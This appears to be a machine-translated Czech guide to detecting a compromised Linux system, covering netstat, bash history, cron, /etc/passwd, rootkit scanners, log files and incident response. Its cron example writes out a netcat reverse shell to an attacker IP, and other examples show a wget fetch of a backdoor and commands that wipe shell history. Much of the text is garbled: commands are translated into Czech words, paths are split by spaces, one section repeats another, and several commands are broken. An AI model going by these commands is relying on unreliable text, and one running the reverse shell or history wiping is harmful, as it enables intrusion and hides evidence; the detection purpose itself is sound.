Jak zjistit, zda je systém Linux kompromitován

Existuje mnoho důvodů, proč by se hacker mohl dostat do vašeho systému a způsobit vám vážné potíže. Před lety to možná bylo předvést své schopnosti, ale v dnešní době mohou být záměry těchto aktivit mnohem komplikovanější s dalekosáhlejšími důsledky pro oběť. Může to znít zjevně, ale jen proto, že „všechno vypadá dobře“, to neznamená, že je vše v pořádku. Hackeři by mohli proniknout do vašeho systému, aniž by vás o tom informovali, a infikovat jej malwarem, aby získali plnou kontrolu, a dokonce i pro boční pohyb mezi systémy. Malware může být v systému skrytý a slouží jako zadní vrátka nebo systém Command & Control pro hackery k provádění škodlivých aktivit ve vašem systému.Je lepší být v bezpečí, než litovat. Možná si hned neuvědomíte, že váš systém byl napaden hackery, ale existuje několik způsobů, jak zjistit, zda je váš systém napaden. Tento článek pojednává o tom, jak zjistit, zda je váš Linux systém byl napaden neoprávněnou osobou nebo se do vašeho systému přihlašuje robot, který provádí škodlivé činnosti.

Netstat

Netstat je důležitý síťový nástroj příkazového řádku TCP / IP, který poskytuje informace a statistiky o používaných protokolech a aktivních síťových připojeních.

Použijeme netstat na příkladu stroje oběti ke kontrole něčeho podezřelého v aktivních síťových připojeních pomocí následujícího příkazu:

[chráněno e-mailem]: ~ $ netstat -antp

Zde uvidíme všechna aktuálně aktivní připojení. Nyní budeme hledat a spojení, které by tam nemělo být.

Tady to je, aktivní spojení na PORTU 44999 (port, který by neměl být otevřený).Můžeme vidět další podrobnosti o připojení, například PID, a název programu, který běží, v posledním sloupci. V tomto případě PID je 1555 a škodlivé užitečné zatížení, které běží, je ./ skořápka.Elf soubor.

Další příkaz ke kontrole portů, které aktuálně poslouchají a jsou aktivní ve vašem systému, je následující:

[chráněno e-mailem]: ~ $ netstat -la

To je docela špinavý výstup. K odfiltrování naslouchání a navázaných připojení použijeme následující příkaz:

[chráněno e-mailem]: ~ $ netstat -la | grep „POSLOUCHAT“ „ZASTAVENO“

Získáte tak pouze výsledky, na kterých vám záleží, abyste je mohli snáze třídit. Vidíme aktivní spojení na port 44999 ve výše uvedených výsledcích.

Po rozpoznání škodlivého procesu můžete proces zabít pomocí následujících příkazů. Poznamenáme si PID procesu pomocí příkazu netstat a zabijte proces pomocí následujícího příkazu:

[chráněno e-mailem]: ~ $ kill 1555

~.historie bash

Linux vede záznamy o tom, kteří uživatelé se přihlásili do systému, z jaké IP adresy, kdy a jak dlouho.

K těmto informacím můžete přistupovat pomocí poslední příkaz. Výstup tohoto příkazu bude vypadat takto:

[chráněno e-mailem]: ~ $ poslední

Výstup zobrazuje uživatelské jméno v prvním sloupci, terminál ve druhém, zdrojovou adresu ve třetím, čas přihlášení ve čtvrtém sloupci a celkovou dobu relace zaznamenanou v posledním sloupci. V tomto případě uživatelé usman a ubuntu stále přihlášeni. Pokud uvidíte jakoukoli relaci, která není autorizovaná nebo vypadá škodlivě, přečtěte si poslední část tohoto článku.

Historie protokolování je uložena v ~.historie bash soubor. Takže historii lze snadno odstranit odstraněním .historie bash soubor. Tuto akci často provádějí útočníci, aby zakryli své stopy.

[chráněno e-mailem]: ~ $ kat .bash_history

Tento příkaz zobrazí příkazy spuštěné ve vašem systému, přičemž nejnovější příkaz se provede v dolní části seznamu.

Historii lze vymazat pomocí následujícího příkazu:

[chráněno e-mailem]: ~ $ historie -c

Tento příkaz smaže pouze historii z terminálu, který právě používáte. Existuje tedy správnější způsob, jak to udělat:

[chráněno e-mailem]: ~ $ cat / dev / null> ~ /.bash_history

Tím se vymaže obsah historie, ale soubor zůstane na svém místě. Pokud tedy vidíte po spuštění pouze své aktuální přihlašovací údaje poslední příkaz, to není vůbec dobré znamení. To znamená, že váš systém mohl být kompromitován a že útočník pravděpodobně vymazal historii.

Pokud máte podezření na uživatele se zlými úmysly nebo IP, přihlaste se jako tento uživatel a spusťte příkaz Dějiny, jak následuje:

[chráněno e-mailem]: ~ $ su
[chráněno e-mailem]: ~ $ historie

Tento příkaz zobrazí historii příkazů čtením souboru .historie bash v /Domov složka daného uživatele. Opatrně hledejte wget, kučera, nebo netcat příkazy, v případě, že útočník použil tyto příkazy k přenosu souborů nebo k instalaci mimo repo nástroje, jako jsou kryptoměnáři nebo spamoví roboti.

Podívejte se na níže uvedený příklad:

Nahoře vidíte příkaz "wget https: // github.com / sajith / mod-rootme.“ V tomto příkazu se hacker pokusil o přístup k souboru mimo repo pomocí wget stáhnout backdoor s názvem „mod-root me“ a nainstalovat jej do vašeho systému. Tento příkaz v historii znamená, že systém je kompromitován a byl backdoorován útočníkem.

Pamatujte, že tento soubor lze snadno vyloučit nebo vyrobit jeho látku. Data zadaná tímto příkazem nesmí být brána jako jednoznačná realita. Přesto v případě, že útočník spustil „špatný“ příkaz a zanedbal evakuaci historie, bude tam.

Cron Jobs

Úlohy Cron mohou sloužit jako důležitý nástroj, pokud jsou nakonfigurovány pro nastavení reverzního shellu na útočníkovém stroji. Úpravy úloh cron jsou důležitou dovedností, stejně jako umět je zobrazit.

K zobrazení úloh cron spuštěných pro aktuálního uživatele použijeme následující příkaz:

[chráněno e-mailem]: ~ $ crontab -l

K zobrazení úloh cron spuštěných pro jiného uživatele (v tomto případě Ubuntu) použijeme následující příkaz:

[chráněno e-mailem]: ~ $ crontab -u ubuntu -l

Chcete-li zobrazit denní, hodinové, týdenní a měsíční úlohy cron, použijeme následující příkazy:

Denní úlohy Cron:

[chráněno e-mailem]: ~ $ ls -la / etc / cron.denně

Hodinové úlohy Cron:

[chráněno e-mailem]: ~ $ ls -la / etc / cron.hodinově

Týdenní úlohy Cron:

[chráněno e-mailem]: ~ $ ls -la / etc / cron.týdně

Vezměte si příklad:

Útočník může umístit úlohu cronu / etc / crontab který spouští škodlivý příkaz každou minutu o 10 minut. Útočník může také spustit škodlivou službu nebo reverzní shell backdoor prostřednictvím netcat nebo nějaký jiný nástroj. Když spustíte příkaz $ ~ crontab -l, uvidíte úlohu cron spuštěnou pod:

[chráněno e-mailem]: ~ $ crontab -l
CT = $ (crontab -l)
CT = $ CT $ '\ n10 * * * * nc -e / bin / bash 192.168.8.131 44 999 '
printf "$ CT" | crontab -
ps aux

Chcete-li správně zkontrolovat, zda byl váš systém napaden, je také důležité zobrazit běžící procesy. Existují případy, kdy některé neoprávněné procesy nespotřebovávají dostatečné využití CPU, aby byly uvedeny v seznamu horní příkaz. To je místo, kde použijeme ps příkaz pro zobrazení všech aktuálně spuštěných procesů.

[chráněno e-mailem]: ~ $ ps auxf

První sloupec zobrazuje uživatele, druhý sloupec zobrazuje jedinečné ID procesu a využití procesoru a paměti se zobrazuje v dalších sloupcích.

Tato tabulka vám poskytne nejvíce informací. Měli byste zkontrolovat každý spuštěný proces a vyhledat něco zvláštního, abyste věděli, zda je systém napaden nebo ne. V případě, že zjistíte něco podezřelého, vygooglete to nebo spusťte pomocí také příkaz, jak je uvedeno výše. To je dobrý zvyk běžet ps příkazy na vašem serveru a zvýší se vaše šance na nalezení něčeho podezřelého nebo mimo vaši každodenní rutinu.

/ etc / passwd

The / etc / passwd soubor sleduje každého uživatele v systému. Toto je dvojtečka oddělená soubor obsahující informace, jako je uživatelské jméno, uživatelské jméno, šifrované heslo, GroupID (GID), celé jméno uživatele, domovský adresář uživatele a přihlašovací shell.

Pokud útočník pronikne do vašeho systému, existuje možnost, že vytvoří několik dalších uživatelů, aby oddělil věci nebo vytvořil backdoor ve vašem systému, aby se mohl pomocí tohoto backdooru dostat zpět. Při kontrole, zda byl váš systém napaden, byste měli také ověřit každého uživatele v souboru / etc / passwd. Zadejte následující příkaz:

[chráněno e-mailem]: ~ $ kočka atd. / heslo

Tento příkaz vám poskytne výstup podobný tomuto níže:

gnome-initial-setup: x: 120: 65534 :: / run / gnome-initial-setup /: / bin / false
gdm: x: 121: 125: Gnome Display Manager: / var / lib / gdm3: / bin / false
usman: x: 1000: 1000: usman: / home / usman: / bin / bash
postgres: x: 122: 128: správce PostgreSQL ,,,: / var / lib / postgresql: / bin / bash
debian-tor: x: 123: 129 :: / var / lib / tor: / bin / false
ubuntu: x: 1001: 1001: ubuntu ,,,: / home / ubuntu: / bin / bash
lightdm: x: 125: 132: Light Display Manager: / var / lib / lightdm: / bin / false
Debian-gdm: x: 124: 131: Správce zobrazení Gnome: / var / lib / gdm3: / bin / false
anonymous: x: 1002: 1002: ,,,: / home / anonymous: / bin / bash

Nyní budete chtít vyhledat libovolného uživatele, kterého si nejste vědomi. V tomto příkladu můžete vidět uživatele v souboru s názvem „anonymous“.„Další důležitá věc, kterou je třeba si uvědomit, je, že pokud útočník vytvořil uživatele, pomocí kterého se bude moci znovu přihlásit, bude mu také přiřazen shell„ / bin / bash “. Vyhledávání tedy můžete zúžit grepováním následujícího výstupu:

[chráněno e-mailem]: ~ $ cat / etc / passwd | grep -i "/ bin / bash"
usman: x: 1000: 1000: usman: / home / usman: / bin / bash
postgres: x: 122: 128: správce PostgreSQL ,,,: / var / lib / postgresql: / bin / bash
ubuntu: x: 1001: 1001: ubuntu ,,,: / home / ubuntu: / bin / bash
anonymous: x: 1002: 1002: ,,,: / home / anonymous: / bin / bash

Chcete-li zpřesnit svůj výstup, můžete provést další „bash magii“.

[chráněno e-mailem]: ~ $ cat / etc / passwd | grep -i "/ bin / bash" | cut -d ":" -f 1
usman
postgres
ubuntu
anonymní

Nalézt

Časové vyhledávání je užitečné pro rychlé třídění. Uživatel může také upravit časová razítka pro změnu souboru. Chcete-li zlepšit spolehlivost, zahrňte do kritérií ctime, protože je mnohem těžší s ním manipulovat, protože vyžaduje úpravy některých souborů úrovně.

K vyhledání souborů vytvořených a upravených za posledních 5 dní můžete použít následující příkaz:

[chráněno e-mailem]: ~ $ find / -mtime -o -ctime -5

K vyhledání všech souborů SUID vlastněných rootem a ke kontrole, zda v seznamech nejsou nějaké neočekávané položky, použijeme následující příkaz:

[chráněno e-mailem]: ~ $ find / -perm -4000 -user root -type f

Chcete-li najít všechny soubory SGID (nastavit ID uživatele) vlastněné rootem a zkontrolovat, zda v seznamech nejsou nějaké neočekávané položky, použijeme následující příkaz:

[chráněno e-mailem]: ~ $ find / -perm -6000 -type f

Chkrootkit

Rootkity jsou jednou z nejhorších věcí, které se v systému mohou stát, a jsou jedním z nejnebezpečnějších útoků, nebezpečnějších než malware a viry, a to jak z hlediska poškození, které systému způsobují, tak z hlediska obtížnosti jejich nalezení a detekce.

Jsou navrženy tak, aby zůstaly skryté a dělaly škodlivé věci, jako je krádež kreditních karet a online bankovnictví. Rootkity Dejte počítačovým zločincům možnost ovládat váš počítačový systém. Rootkity také pomáhají útočníkovi sledovat vaše stisknutí kláves a deaktivovat antivirový software, což ještě více usnadňuje krádež vašich soukromých informací.

Tyto typy malwaru mohou zůstat ve vašem systému po dlouhou dobu, aniž by si toho uživatel vůbec všiml, a mohou způsobit vážné škody. Jednou Rootkit je detekován, neexistuje jiný způsob, než přeinstalovat celý systém. Někdy mohou tyto útoky způsobit i selhání hardwaru.

Naštěstí existují některé nástroje, které mohou pomoci detekovat Rootkity v systémech Linux, jako jsou Lynis, Clam AV nebo LMD (Linux Malware Detect). Můžete zkontrolovat, zda váš systém není znám Rootkity pomocí níže uvedených příkazů.

Nejprve nainstalujte Chkrootkit pomocí následujícího příkazu:

[email protected]: ~ $ sudo apt install chkrootkit

Tím se nainstaluje Chkrootkit nářadí. Tento nástroj můžete použít ke kontrole Rootkitů pomocí následujícího příkazu:

[chráněno e-mailem]: ~ $ sudo chkrootkit

Balíček Chkrootkit se skládá z shellového skriptu, který kontroluje systémové binární soubory, zda neobsahuje rootkit, a několika programů, které kontrolují různé bezpečnostní problémy. Ve výše uvedeném případě balíček zkontroloval, zda v systému není známka Rootkitu, a nenašel žádný. To je dobré znamení!

Protokoly systému Linux

Protokoly Linuxu poskytují harmonogram událostí v pracovním rámci a aplikacích Linuxu a jsou důležitým vyšetřovacím nástrojem, když narazíte na problémy. Primární úkol, který musí administrátor provést, když zjistí, že je systém ohrožen, by měl rozebrat všechny záznamy protokolu.

U problémů s explicitní aplikací pracovní oblasti se záznamy protokolu udržují v kontaktu s různými oblastmi. Například Chrome sestavuje zprávy o selhání do '~ /.chrome / Crash Reports '), kde aplikace v pracovní oblasti sestavuje protokoly závislé na inženýrovi a ukazuje, zda aplikace zohledňuje vlastní uspořádání protokolu. Záznamy jsou v/ var / log adresář. Existují linuxové protokoly pro všechno: framework, part, šéfové balíčků, bootovací formuláře, Xorg, Apache a MySQL. V tomto článku se téma výslovně soustředí na protokoly rámce Linuxu.

Do tohoto katalogu můžete přejít pomocí objednávky kompaktních disků. K prohlížení nebo změně souborů protokolu byste měli mít oprávnění root.

[chráněno e-mailem]: ~ $ cd / var / log

Pokyny k zobrazení protokolů systému Linux

K zobrazení potřebných dokumentů protokolu použijte následující příkazy.

Linuxové protokoly lze zobrazit pomocí příkazu cd / var / log, v tom okamžiku vytvořením objednávky, abyste viděli protokoly odložené v tomto katalogu. Jedním z nejvýznamnějších protokolů je syslog, který zaznamenává mnoho důležitých protokolů.

ubuntu @ ubuntu: cat syslog

K dezinfekci výstupu použijeme „méně" příkaz.

ubuntu @ ubuntu: cat syslog | méně

Zadejte příkaz var / log / syslog vidět pár věcí pod soubor syslog. Zaměření na konkrétní problém bude nějakou dobu trvat, protože tento záznam bude obvykle dlouhý. Stisknutím Shift + G se v záznamu posunete dolů na KONEC, označený „KONEC.“

Rovněž můžete vidět protokoly pomocí dmesg, který vytiskne podporu dílčího kroužku. Tato funkce vytiskne vše a pošle vás po dokumentu co nejdále. Od tohoto okamžiku můžete objednávku využít dmesg | méně prohlédnout výnos. V případě, že potřebujete zobrazit protokoly pro daného uživatele, budete muset spustit následující příkaz:

dmesg - zařízení = uživatel

Závěrem můžete využít pořadí ocasu k prohlížení protokolů. Je to malý, ale užitečný nástroj, který lze použít, protože se používá k zobrazení poslední části protokolů, kde s největší pravděpodobností došlo k problému. Můžete také určit počet posledních bajtů nebo řádků, které se mají zobrazit v příkazu ocas. K tomu použijte příkaz ocas / var / log / syslog. Existuje mnoho způsobů, jak se na protokoly dívat.

Pro určitý počet řádků (model zohledňuje posledních 5 řádků) zadejte následující příkaz:

[chráněno e-mailem]: ~ $ tail -f -n 5 / var / log / syslog

Tím se vytiskne posledních 5 řádků. Když přijde další linka, první bude evakuována. Chcete-li se dostat pryč od pořadí ocasu, stiskněte Ctrl + X.

Důležité protokoly Linuxu

Mezi primární čtyři protokoly systému Linux patří:

Protokoly aplikací
Protokoly událostí
Servisní protokoly
Systémové protokoly

ubuntu @ ubuntu: cat syslog | méně

/ var / log / syslog nebo / var / log / zprávy: obecné zprávy, stejně jako data související s rámcem. Tento protokol ukládá všechny informace o akci přes celosvětový rámec.

ubuntu @ ubuntu: kočka ověř.přihlásit | méně

/ var / log / autorizace.log nebo / var / log / zabezpečit: ukládat ověřovací protokoly, včetně účinných i zkreslených přihlašovacích údajů a ověřovacích strategií. Debian a Ubuntu / var / log / autorizace.log ukládat pokusy o přihlášení, zatímco Redhat a CentOS používají / var / log / zabezpečit k ukládání protokolů ověřování.

ubuntu @ ubuntu: boot pro kočky.přihlásit | méně

/ var / log / boot.log: obsahuje informace o bootování a zprávách během spouštění.

ubuntu @ ubuntu: cat maillog | méně

/ var / log / maillog nebo / var / log / mail.log: ukládá všechny protokoly identifikované poštovními servery; cenné, když potřebujete data o postfixu, smtpd nebo jakýchkoli e-mailových správách běžících na vašem serveru.

ubuntu @ ubuntu: kočičí kern | méně

/ var / log / kern: obsahuje informace o protokolech jádra. Tento protokol je důležitý pro vyšetřování vlastních částí.

ubuntu @ ubuntu: kočka dmesg | méně

/ var / log / dmesg: obsahuje zprávy, které identifikují ovladače gadgetů. Pořadí dmesg lze použít k zobrazení zpráv v tomto záznamu.

ubuntu @ ubuntu: cat faillog | méně

/ var / log / faillog: obsahuje údaje o všech zmařených pokusech o přihlášení, které jsou cenné pro získání bitů znalostí o pokusech o penetraci zabezpečení; například ti, kteří se snaží hacknout přihlašovací osvědčení, stejně jako útoky zvířecí síly.

ubuntu @ ubuntu: kočka cron | méně

/ var / log / cron: ukládá všechny zprávy související s Cron; například zaměstnání cron, nebo když démon cron zahájil povolání, související zprávy o zklamání atd.

ubuntu @ ubuntu: kočka jo.přihlásit | méně

/ var / log / yum.log: při šanci, že zavedete balíčky využívající pořadí yum, tento protokol ukládá všechna související data, což může být užitečné při rozhodování, zda byl balíček a všechny segmenty účinně zavedeny.

ubuntu @ ubuntu: kočka httpd | méně

/ var / log / httpd / nebo / var / log / apache2: tyto dva adresáře se používají k ukládání všech typů protokolů pro server Apache HTTP, včetně protokolů přístupu a protokolů chyb. Soubor error_log obsahuje všechny chybné požadavky přijaté serverem http. Tyto chyby zahrnují problémy s pamětí a další omyly související s rámcem. Access_log obsahuje záznam všech žádostí přijatých přes HTTP.

ubuntu @ ubuntu: kočka mysqld.přihlásit | méně

/ var / log / mysqld.log nebo/ var / log / mysql.log : dokument protokolu MySQL, který zaznamenává všechny zprávy o selhání, ladění a úspěchu. Toto je další výskyt, kdy rámec směřuje do registru; RedHat, CentOS, Fedora a další rámce založené na RedHat používají / var / log / mysqld.log, zatímco Debian / Ubuntu využívá / var / log / mysql.katalog deníků.

Nástroje pro prohlížení protokolů Linux

Dnes je k dispozici mnoho sledovačů protokolů a vyšetřovacích zařízení s otevřeným zdrojovým kódem, což usnadňuje výběr správných prostředků pro protokoly akcí, než byste mohli předpokládat. Bezplatný a otevřený zdroj Kontrola protokolu může pracovat na jakémkoli systému, aby dokončil práci. Zde je pět z nejlepších, které jsem v minulosti použil, v žádném konkrétním pořadí.

GREYLOG

Společnost Graylog, která byla zahájena v Německu v roce 2011, je nyní nabízena buď jako zařízení s otevřeným zdrojovým kódem, nebo jako obchodní ujednání. Graylog je zamýšlen jako sdružený log-the-board framework, který přijímá informační toky z různých serverů nebo koncových bodů a umožňuje vám rychle si tato data prohlédnout nebo rozebrat.

Graylog díky své jednoduchosti a univerzálnosti vytvořil mezi hlavami rámců pozitivní proslulost. Většina webových podniků začíná málo, přesto se může vyvíjet exponenciálně. Graylog může upravovat hromádky v systému back-endových serverů a každý den zpracovávat několik terabajtů informací o protokolu.

Předsedové IT uvidí přední část rozhraní GrayLog jako snadno použitelnou a energicky použitelnou. Graylog pracuje na myšlence řídicích panelů, které uživatelům umožňují zvolit typ měření nebo zdroje informací, které považují za důležité, a po nějaké době rychle sledovat sklon.

Dojde-li k epizodě zabezpečení nebo spuštění, musí mít předsedové IT možnost sledovat projevy k podkladovému ovladači tak rychle, jak lze rozumně očekávat. Díky funkci vyhledávání Graylogu je tento úkol jednoduchý. Tento nástroj pracoval v adaptaci na vnitřní selhání, které může spustit vícevláknové podniky, takže můžete společně rozebrat několik potenciálních nebezpečí.

NAGIOS

Společnost Nagios, kterou zahájil jediný vývojář v roce 1999, se od té doby stala jedním z nejpevnějších open source nástrojů pro dohled nad logovacími informacemi. Současné ztvárnění Nagiosu lze implementovat na serverech s libovolným operačním systémem (Linux, Windows atd.).).

Zásadní položkou společnosti Nagios je server protokolu, který zefektivňuje sortiment informací a data postupně zpřístupňuje vedoucím pracovníkům rámce. Motor serveru protokolu Nagios bude informace zachycovat postupně a přenášet je do průkopnického vyhledávacího nástroje. Začlenění do jiného koncového bodu nebo aplikace je jednoduchá odměna tomuto vlastnímu průvodce uspořádáním.

Nagios se často používá v asociacích, které potřebují prověřovat zabezpečení svých čtvrtí, a může zkontrolovat celou řadu příležitostí souvisejících se systémem, aby pomohl robotizovat přenos upozornění. Nagios lze naprogramovat tak, aby splňoval určité úkoly, když je splněna určitá podmínka, což umožňuje uživatelům detekovat problémy ještě před zahrnutím lidských potřeb.

Jako hlavní aspekt hodnocení systému bude Nagios směrovat informace o protokolu v závislosti na geografické oblasti, kde začíná. Lze implementovat kompletní řídicí panely s inovací mapování, abyste viděli streamování webového provozu.

LOGALYZE

Logalyze vyrábí nástroje open source pro ředitele rámců nebo správce systémů a specialisty na zabezpečení, aby jim pomohli s dohledem nad protokoly serveru a umožnili jim soustředit se na transformaci protokolů na cenné informace. Podstatnou položkou tohoto nástroje je, že je přístupný jako soubor ke stažení zdarma pro domácí i firemní použití.

Zásadní položkou společnosti Nagios je server protokolu, který zefektivňuje sortiment informací a data postupně zpřístupňuje vedoucím pracovníkům rámce. Motor serveru Nagios log bude postupně získávat informace a přenášet je do průkopnického vyhledávacího nástroje. Začlenění do jiného koncového bodu nebo aplikace je jednoduchá odměna tomuto vlastnímu průvodce uspořádáním.

Co byste měli dělat, pokud jste byli kompromitováni?

Hlavní věcí není panikařit, zvláště pokud je právě přihlášena neoprávněná osoba. Měli byste mít možnost převzít kontrolu nad strojem dříve, než druhá osoba zjistí, že o ní víte. V případě, že vědí, že jste si vědomi jejich přítomnosti, může vás útočník držet mimo váš server a začít ničit váš systém. Pokud nejste tak technický, pak musíte okamžitě vypnout celý server. Server můžete vypnout pomocí následujících příkazů:

[chráněno e-mailem]: ~ $ shutdown -h now

Nebo

[chráněno e-mailem]: ~ $ systemctl poweroff

Další způsob, jak toho dosáhnout, je přihlásit se k ovládacímu panelu poskytovatele hostingu a odtud jej vypnout. Jakmile je server vypnutý, můžete pracovat na pravidlech brány firewall, která jsou potřebná, a konzultovat s kýmkoli pomoc ve svém vlastním čase.

V případě, že se cítíte sebejistěji a váš poskytovatel hostingu má bránu firewall proti proudu, vytvořte a povolte následující dvě pravidla:

Povolte provoz SSH pouze z vaší adresy IP.
Blokujte vše ostatní, nejen SSH, ale každý protokol běžící na každém portu.

Chcete-li zkontrolovat aktivní relace SSH, použijte následující příkaz:

[chráněno e-mailem]: ~ $ ss | grep ssh

Pomocí následujícího příkazu zabijte jejich relaci SSH:

[chráněno e-mailem]: ~ $ kill

To zabije jejich relaci SSH a umožní vám přístup na server. V případě, že nemáte přístup k předcházejícímu firewallu, budete muset vytvořit a povolit pravidla brány firewall na samotném serveru. Poté, když jsou nastavena pravidla brány firewall, zabijte relaci SSH neoprávněného uživatele pomocí příkazu „kill“.

Pokud je k dispozici poslední technika, přihlaste se k serveru pomocí out-of-band připojení, například sériové konzoly. Zastavte všechny sítě pomocí následujícího příkazu:

[chráněno e-mailem]: ~ $ systemctl zastavit síť.servis

Tím se úplně zastaví, aby se k vám dostal jakýkoli systém, takže byste nyní mohli aktivovat ovládací prvky brány firewall ve svém vlastním čase.

Jakmile znovu získáte kontrolu nad serverem, nedůvěřujte mu. Nepokoušejte se věci opravit a znovu je použít. To, co je rozbité, nelze opravit. Nikdy byste nevíte, co by mohl útočník udělat, a proto byste si nikdy neměli být jisti, že je server zabezpečený. Přeinstalování by tedy mělo být vaším posledním krokem.